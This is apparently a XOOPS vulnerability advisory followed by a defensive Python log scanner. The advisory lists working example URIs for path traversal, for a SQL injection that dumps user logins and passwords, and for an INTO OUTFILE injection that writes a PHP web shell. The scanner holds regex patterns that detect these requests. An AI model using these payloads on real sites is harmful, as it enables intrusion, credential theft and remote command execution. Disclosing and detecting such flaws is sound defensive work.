XOOPS Multiple Input Validation Vulnerabilities
No exploit is required. Example URIs have been provided:

http://www.example.com/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script

http://www.example.com/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00

http://www.example.com/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script

http://www.example.com/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00

http://www.example.com/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../script

http://www.example.com/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?xoopsConfig[language]=../../../../../../../../../../boot.ini%00

http://www.example.com/[path_to_xoops]/modules/wfdownloads/viewcat.php?list=-'%20UNION%20SELECT%200,0,loginname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass,0,0%20FROM%20fXZtr_users%20WHERE%20level=5/*

http://www.example.com/[path_to_xoops]/modules/wfdownloads/viewcat.php?list=-1'%20or'a'='a'%20UNION%20SELECT%200,0,0,'<?php%20system($_GET[cmd]);?>',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20INTO%20OUTFILE%20'../../www/xoops/uploads/shell.php'%20FROM%20fXZtr_wfdownloads_downloads/*
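For defenders reviewing web server logs, the request shapes listed above can be matched as follows. This is an added example, not part of the original advisory: the rule names and the sample log lines are constructed, and it assumes that legitimate requests never supply an xoopsConfig[...] key in the query string.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request target from a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Script paths named in the advisory's example URIs.
EDITOR = re.compile(r"/class/xoopseditor/[^/]+/editor_registry\.php$")
VIEWCAT = re.compile(r"/modules/wfdownloads/viewcat\.php$")
# SQL metacharacters and keywords that have no place in the 'list' parameter.
SQLI = re.compile(r"'|\bunion\b.+\bselect\b|\binto\s+outfile\b", re.I | re.S)

def findings(target):
    """Return the set of rule names (constructed labels) that fire for one request target."""
    parts = urlsplit(target)
    hits = set()
    # parse_qsl percent-decodes keys and values, so %00 and %27 are seen decoded.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if EDITOR.search(parts.path) and key.startswith("xoopsConfig["):
            hits.add("config-override")  # assumption: never legitimate in a query string
            if "../" in value or "..\\" in value or "\x00" in value:
                hits.add("path-traversal")
        if VIEWCAT.search(parts.path) and key == "list" and SQLI.search(value):
            hits.add("sql-injection")
    return hits

def scan(log_lines):
    """Return (line_number, sorted rule names) for every line that matches a rule."""
    results = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        hits = findings(match.group(1)) if match else set()
        if hits:
            results.append((number, sorted(hits)))
    return results

# Constructed sample log lines (documentation addresses, shortened payloads).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2006:10:00:00 +0000] "GET /xoops/modules/wfdownloads/viewcat.php?list=A HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2006:10:00:05 +0000] "GET /xoops/class/xoopseditor/koivi/editor_registry.php?xoopsConfig[language]=../../../boot.ini%00 HTTP/1.1" 200 312',
    '192.0.2.12 - - [01/Jan/2006:10:00:09 +0000] "GET /xoops/modules/wfdownloads/viewcat.php?list=-%27%20UNION%20SELECT%200,0,loginname HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, ", ".join(hits))
```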